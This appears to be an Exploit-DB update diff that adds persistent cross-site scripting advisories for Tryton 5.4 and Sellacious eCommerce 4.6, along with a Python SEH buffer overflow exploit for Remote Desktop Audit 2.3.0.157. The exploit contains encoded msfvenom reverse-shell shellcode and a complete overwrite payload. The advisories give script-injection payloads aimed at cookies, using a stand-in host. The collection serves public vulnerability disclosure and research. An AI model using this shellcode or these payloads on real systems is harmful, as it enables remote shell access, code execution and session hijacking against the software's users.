DB: 2020-05-14

4 changes to exploits/shellcodes

Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
Tryton 5.4 - Persistent Cross-Site Scripting
Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting

exploits/php/webapps/48457.txt

@@ -38,9 +38,3 @@ Parameter: id (GET)
 web server operating system: Linux Ubuntu
 web application technology: Apache 2.4.29
 back-end DBMS: MySQL >= 5.0.12
-
-I am looking forward to you accepting and approving my PoC.
-
-Thankyou!
-
-Vu Tien Hoa

exploits/php/webapps/48466.txt

@@ -0,0 +1,171 @@
+# Exploit Title: Tryton 5.4 - Persistent Cross-Site Scripting
+# Exploit Author: Vulnerability-Lab
+# Date: 2020-05-13
+# Vendor Homepage: https://www.tryton.org/
+# Version: 5.4
+# Software Link: https://www.tryton.org/download
+
+
+Document Title:
+===============
+Tryton v5.4 - (Name) Persistent Cross Site Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2233
+
+
+Common Vulnerability Scoring System:
+====================================
+4.4
+
+
+Product & Service Introduction:
+===============================
+https://www.tryton.org/  &  https://www.tryton.org/download
+
+
+Affected Product(s):
+====================
+Tryton Foundation
+Product: Tryton v5.4 - CMS (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-12: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official Tryton v5.4 web-application series.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent vulnerability is located in the `name` parameter of the
+`User Profile` module. Remote attackers with low
+privileges are able to inject own malicious persistent script code as
+name for user accounts. The injected code can be
+used to attack the frontend or backend of the web-application. The
+request method to inject is POST and the attack vector
+is located on the application-side. Injection point is the profile input
+field with the name value and the execute occurs
+in the front ui on top right were the avatar is listed or in the admin
+backend on the res.user;name="Users"&views.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent
+external redirects to malicious source and persistent manipulation of
+affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] User Profile
+
+Vulnerable Input(s):
+[+] Name
+
+Vulnerable Parameter(s):
+[+] name
+
+Affected Module(s):
+[+] /index
+[+] /model/res.user;name="Users"&views (backend)
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by low privileged web
+application user account with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the application and login to your low privileged user account
+2. Move to the profile on top right side (click)
+3. Inject test payload to the "Name" input field and save the entry
+4. Execution occurs after save on top right and
+/model/res.user;name="Users"&views of the admin backend
+5. Successful reproduce of the persistent cross site vulnerability!
+
+
+PoC: Payload
+%20>"><img%20src="evil.source%20onload=alert(document.cookie)>
+
+
+PoC: Vulnerable Source (Execution Point)
+<div class="input-group input-group-sm"><span
+class="input-group-btn"><button type="button" class="btn
+btn-default">Filters</button></span>
+<input class="form-control mousetrap" placeholder="Search"
+autocomplete="off" list="ui-id-3"><datalist id="ui-id-3"></datalist>
+<span class="input-group-btn"><button type="button" class="btn
+btn-default hidden-md hidden-lg" aria-label="Clear Search"
+title="Clear Search" style="display: none;"><img class="icon"
+src="blob:https://tryton.localhost:8080/4672612e-3ec6-4bd1-aa4d-bd379bd89c04"></button>
+<button type="submit" class="btn btn-default" aria-label="Search"
+title="Search"><img class="icon"
+src="blob:https://demo5.4.tryton.org/ab0d098c-1302-4ffa-8f27-3204fb244082"></button><button
+class="btn btn-default hidden-xs"
+type="button" title="Bookmark this filter" aria-label="Bookmark this
+filter"><img class="icon" aria-hidden="true"
+src="blob:https://demo5.4.tryton.org/d97b8af2-ca4b-48e2-a40e-a772955d7ea8"></button><button
+type="button" class="btn btn-default
+dropdown-toggle" data-toggle="dropdown" aria-expanded="false"
+aria-label="Bookmarks" title="Bookmarks" id="bookmarks" disabled="">
+<img aria-hidden="true" class="icon"
+src="blob:https://demo5.4.tryton.org/c9b2efdd-1ec8-4785-b7a0-d3b8dcb6d7e9"></button>
+<ul class="dropdown-menu dropdown-menu-right" role="menu"
+aria-labelledby="bookmarks"></ul><button type="button"
+class="btn btn-default hidden-xs" aria-expanded="false" aria-label="Show
+inactive records" title="Show inactive records">
+<img aria-hidden="true" class="icon"
+src="blob:https://demo5.4.tryton.org/6ad6ad9c-4d17-4592-9e3c-6f698b6f9a27"></button></span></div>
+
+
+--- PoC Session Logs [POST] ---
+https://tryton.localhost:8080/tryton/
+Host: tryton.localhost:8080
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/json
+Authorization: Session
+ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM=
+X-Requested-With: XMLHttpRequest
+Content-Length: 527
+Origin: https://tryton.localhost:8080
+Connection: keep-alive
+Referer: https://tryton.localhost:8080/
+{"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>"><img%20src="evil.source%20onload=alert(document.cookie)>">",
+"signature":"test
+signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1,
+"company.rec_name":"Michael Scott Paper
+Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10],
+"locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time":
+{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]}
+-
+POST: HTTP/2.0 200 OK
+server: nginx/1.16.1
+content-type: application/json
+access-control-allow-origin: https://tryton.localhost:8080
+vary: Origin
+content-encoding: gzip
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM

exploits/php/webapps/48467.txt

@@ -0,0 +1,138 @@
+# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
+# Exploit Author: gurbanli
+# Date: 2020-05-13
+# Vendor Homepage: https://www.sellacious.com
+# Version: 4.6
+# Software Link:  https://www.sellacious.com/free-open-source-ecommerce-software
+
+Document Title:
+===============
+Sellacious eCommerce - Multiple Persistent Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2226
+
+
+Common Vulnerability Scoring System:
+====================================
+4.6
+
+
+Product & Service Introduction:
+===============================
+https://www.sellacious.com/free-open-source-ecommerce-software
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-08: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official Sellacious eCommerce Shop CMS (2020 Q1).
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The cross site web vulnerabilities are located in the all the adress
+input fields of the `Manage Your Addresses` module.
+Remote attackers are able to register a low privilege user account to
+inject own malicious script code to the adress
+information page. The execution of the script code occurs each time the
+adress information is used in the web ui of
+the ecommerce application. The request method to inject is POST and the
+attack vector is persistent on the application-side.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent
+external redirects to malicious source and persistent manipulation of
+affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Manage Your Addresses
+
+Vulnerable Input(s):
+[+] Full name
+[+] First name
+[+] Middle name
+[+] Last name
+[+] Company
+[+] PO Box
+[+] Address
+[+] Landmark
+
+Affected(s):
+[+] index.php/manage-your-addresses
+[+] Backend user adress information listing
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with user account and low user interaction.
+For security demonstration or to reproduce the web vulnerability follow
+the provided information and steps below to continue.
+
+
+PoC: Exploitation
+<iframe src="evil.source" onload=alert(document.cookie)>
+<iframe src="evil.source" onload=alert(document.domain)>
+
+
+PoC: Vulnerable Source
+<div class="addresses-container">
+<div class="address-heading">
+<h2>Your addresses
+<a href="#address-form-0" role="button" data-toggle="ctech-modal"
+class="ctech-mb-3 btn-add-address ctech-float-right ctech-text-primary">
+<i class="fa fa-plus"></i> <span class="add-address-text">Add New
+Address</span></a></h2></div>
+<div id="addresses" class="cart-aio ctech-text-center">
+<div id="address-editor">
+<ul id="address-items" data-original-title="" title=""> <li
+class="address-item" id="address-item-9"> <div class="ctech-float-right
+address-action">
+<button type="button" class="ctech-btn ctech-btn-small ctech-btn-default
+hasTooltip remove-address" data-placement="bottom" data-id="9" title=""
+data-original-title="Delete"><i class="fa fa-trash-alt"></i></button> <a
+href="#address-form-9" role="button" data-toggle="ctech-modal"
+data-placement="bottom"
+class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip" title=""
+data-original-title="Edit"><i class="fa fa-edit"></i></a> </div>
+<div class="address-content"> <span class="address_name">>"<iframe
+src="evil.source"></span> <span class="address_company">>"<iframe
+src="evil.source"></span>
+<span class="address_po_box">PO #: >"<iframe src="evil.source"></span>
+<span class="address_address has-comma">>"<iframe src="evil.source"></span>
+<span class="address_landmark has-comma">>"<iframe
+src="evil.source"></span> <span class="address_country">United
+States</span>
+<div class="cart_address_box w100p"> <div class="cart_address_buttons">
+</div> </div> </div> </li> <li class="address-item odd-address-item">
+<a href="#address-form-0" role="button" data-toggle="ctech-modal"
+class="btn-new-address"><i class="fa fa-plus"></i></a> </li>
+</iframe></span></div></li></ul>
+<div class="ctech-wrapper">
+</div><div class="ctech-clearfix"></div>
+</div><div class="ctech-clearfix"></div>
+</div></div>
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM

exploits/windows/local/48465.py

@@ -0,0 +1,72 @@
+# Exploit Title: Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
+# Exploit Author: gurbanli
+# Date: 2020-05-12
+# Vulnerable Software: Remote Desktop Audit 2.3.0.157
+# Vendor Homepage: https://lizardsystems.com
+# Version: 2.3.0.157
+# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe
+# Tested on: Windows 7 x86
+f = file('payload.txt','w')
+
+"""
+Same with LanSend 3.2, but with different ppr address.
+PoC
+1. Run exploit
+2. Run Remote Desktop Audit and Click Add Computers Wizard
+3. Choose import computers from file
+4. Copy/paste payload.txt content into filename section
+5. shellcode will be executed
+
+"""
+
+"""
+msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
+"""
+
+shellcode =  b""
+shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf"
+shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17"
+shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b"
+shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa"
+shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89"
+shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92"
+shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c"
+shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1"
+shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9"
+shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae"
+shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01"
+shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7"
+shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b"
+shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59"
+shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a"
+shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a"
+shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6"
+shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14"
+shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98"
+shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda"
+shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32"
+shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc"
+shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75"
+shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52"
+shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b"
+shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8"
+shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a"
+shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b"
+shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f"
+shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e"
+shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c"
+shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7"
+
+"""
+047FFF09   59               POP ECX
+047FFF0A   59               POP ECX
+047FFF0B   80C1 64          ADD CL,64
+047FFF0E  ^FFE1             JMP ECX
+"""
+jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1'
+
+"""ppr 00418230"""
+
+payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x30\x82\x41'
+f.write(payload)
+f.close()

files_exploits.csv

@@ -11070,6 +11070,7 @@ id,file,description,date,author,type,platform,port
 48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
 48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
 48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
+48465,exploits/windows/local/48465.py,"Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)",2020-05-13,gurbanli,local,windows,
 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
@@ -42694,3 +42695,5 @@ id,file,description,date,author,type,platform,port
 48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java,
 48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php,
 48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",2020-05-12,"Anthony Cole",webapps,java,
+48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
+48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,